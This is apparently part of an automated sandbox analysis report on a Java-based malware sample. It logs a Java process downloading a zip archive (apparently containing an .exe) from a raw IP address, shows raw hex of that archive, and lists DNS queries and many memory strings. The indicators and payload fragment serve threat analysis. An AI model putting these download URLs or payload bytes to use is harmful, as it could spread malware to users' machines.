                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: unknownTCP traffic detected without corresponding DNS query: 77.238.245.43
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 22:53:33 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Sun, 15 Dec 2024 14:19:18 GMTETag: "25a7f-6294fbfd8df7a"Accept-Ranges: bytesContent-Length: 154239Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/zipData Raw: 50 4b 03 04 0a 00 00 00 00 00 68 25 8f 59 00 00 00 00 00 00 00 00 00 00 00 00 13 00 00 00 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2f 50 4b 03 04 14 00 00 00 08 00 40 25 8f 59 28 24 99 9b 11 59 02 00 00 26 03 00 29 00 00 00 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2f 6d 65 64 69 63 61 6c 61 6e 61 6c 79 73 69 73 70 72 6f 2e 65 78 65 ec bd 0b 7c 54 c5 f5 38 3e fb ca 6e 1e cb 0d 90 40 00 81 00 01 22 01 8c 04 24 21 89 64 93 5d d8 c5 0d 44 12 1e 62 90 84 3c 20 1a 92 35 d9 25 41 41 83 9b 48 c2 75 0b 5a b5 6a ad af 5a 4b 6d 6b b1 b5 05 a2 62 42 90 80 a0 20 f8 c0 a2 16 9f dd b8 56 a3 df 0a c1 07 f7 7f ce cc dc c7 26 c4 b6 bf ff ff ff f9 3f 7e 5d d8 9c 3b 67 66 ce 9c 39 73 e6 cc 99 d7 dd fc 55 3b 89 81 10 62 84 af 24 11 b2 97 b0 4f 0e f9 d7 9f 20 7c 87 8c 6f 1f 42 9e 8b 7c 75 c2 5e 9d fb d5 09 45 eb ab ea 13 3d 75 b5 eb ea 4a 37 24 96 95 d6 d4 d4 7a 13 d7 56 24 d6 f9 6a 12 ab 6a 12 ed 4b 0a 13 37 d4 96 57 cc b4 5a a3 92 38 0d fb e9 8b 15 64 df ce ab e4 6f dc c9 fb e6 ea 28 fc e9 5c 3d 85 f7 ce 1d 46 e1 dd 73 87 d2 34 77 5f f5 18 0d 3f 30 37 8a c2 da ab 58 fa 7b 68 be a5 55 65 eb 29 ad 7e 9f 02 07 21 e5 77 46 90 be 83 63 9e 91 71 bd 64 22 89 d6 0f 89 23 9b 21 f0 94 9e 21 ef 80 6f 2c 7d ca d1 11 fe 0c 51 51 84 7d 23 e4 cc 4d 06 2a b4 95 e3 8d 10 5d d2 49 88 85 e1 13 e5 04 b1 61 a0 df 23 c9 7a 82 90 e7 18 13 e4 7b 2f 14 70 16 28 18 35 09 3c 06 4a 2a f6 21 42 8a c8 e0 9f d8 9d 84 24 e8 d4 70 f2 dd c0 82 69 f0 f4 33 bd 15 8d 5e 64 ff 56 ce d0 66 de f8 9a 0f 94 5b 32 b3 ae bc d4 5b 4a c8 e1 89 80 80 32 08 36 58 13 4f a0 ea 48 ce 4c 96 8c 90 f1 f0 ed e0 b4 9e 1c 90 ae 63 a6 87 25 a4 75 3c cb 05 b9 eb 12 f4 ea ea eb ca 30 d0 a4 a7 b2 21 1b 01 3e 73 a9 74 15 d5 b5 65 94 57 2a 2b 6c 23 92 64 e8 9f 2e 97 fc f7 f3 a3 9f 63 fc e3 48 3b e2 0c e4 4a b6 f6 8b 92 74 bb ed f9 15 c4 dc e4 ca 3c e0 10 16 1e 75 b4 1c 69 5c e8 6c 39 e9 9d e8 4e 39 e9 4e e9 74 05 8c c3 9c 2d 1d de e1 b6 ed 46 4b 73 87 37 ba 55 e7 94 3a 9d fe cf 74 be 8f 21 99 33 60 93 9c 82 a3 d3 79 fe af 8e 31 47 6c e7 5f b7 6d fd e0 16 a0 76 88 90 90 05 c9 18 0e e9 88 4d ec ec 3a 76 4c 53 b6 5b 3c 99 2f 9e 76 8a af db f6 d2 a2 81 15 67 36 b2 02 1c 1c 46 0e e6 b8 c4 57 9c e2 81 7c 20 30 a4 29 9d 78 23 9d 52 87 d3 df a3 f3 7d ed 14 a1 ac d3 ac 2c c7 a4 c3 ce 96 23 5e 4b be 78 00 38 0d 19 1c 69 1d 98 79 25 64 76 05 e2 62 5d 29 87 bd 33 21 7d 7e a0 15 69 bb 52 0e b8 0d 87 dd 29 7f cd 87 3c 23 a0 3a c3 a1 3a 43 5a f5 2e e9 88 53 3a 40 a9 7f e2 6c a1 72 81 1a 1d 70 9e 7f a7 7f 8d c2 eb e1 6e b3 27 25 b8 db dc 49 89 85 cb 57 38 fd 9f 27 a6 49 4e a5 22 4e f1 ab 7d 58 35 61 e1 85 16 a9 31 d3 19 58 25 39 c5 d7 9c e2 29 77 c0 9d b4 12 52 4a f1 0f 34 13 22 8c b7 13 d2 d2 d1 28 38 1f 70 66 76 35 58
                    Source: global trafficHTTP traffic detected: GET /temp/Nomrwfj.mp4 HTTP/1.1Host: erdogansigorta.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tamus/medicalanalysispro.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 77.238.245.43Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: keep-alive
                    Source: global trafficDNS traffic detected: DNS query: erdogansigorta.com
                    Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                    Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                    Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                    Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                    Source: global trafficDNS traffic detected: DNS query: ntp.time.nl
                    Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: msedge.exe, 0000001B.00000002.3174477570.00004D3C002D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:8000/446d3de0/c7af6c55
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000ACF5000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4545639440.0000000016A16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://77.238.245.43/tamus/medicalanalysispro.zip
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/allow-java-encodings
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/disallow-doctype-declinte
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionG
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/include-comments1
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/parser-settings
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespace-growth;
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2228038429.00000000159BB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.00000000159BE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.00000000159BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/namespacesq
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdA
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/standard-uri-conformantno
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotations
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validate-annotationsl
                    Source: javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2232527015.0000000015AEB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/dynamic
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/element-default=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/schema:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef#l
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydefD
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language:
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/features/xincludeC
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/current-element-node7
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-size
                    Source: javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/input-buffer-sizeache.o
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/document-scanner5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner;
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-manager:
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver?
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-handler=
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/error-reporter8
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
                    Source: javaw.exe, javaw.exe, 00000003.00000003.2231217783.0000000015AE2000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3001038964.0000000015AD9000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2228038429.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2335885806.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.0000000015A77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.3003103430.0000000015AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver1C5
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table
                    Source: javaw.exe, 00000003.00000003.2336673647.00000000152CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/symbol-table6
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation-manager
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validation/schema/dv-factory
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtd
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/dtdD
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/validator/schema(
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler
                    Source: javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/internal/xinclude-handler;
                    Source: javaw.exe, 00000003.00000002.4539258471.000000000A863000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000003.00000002.4543801058.00000000159A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apache.org/xml/properties/locale
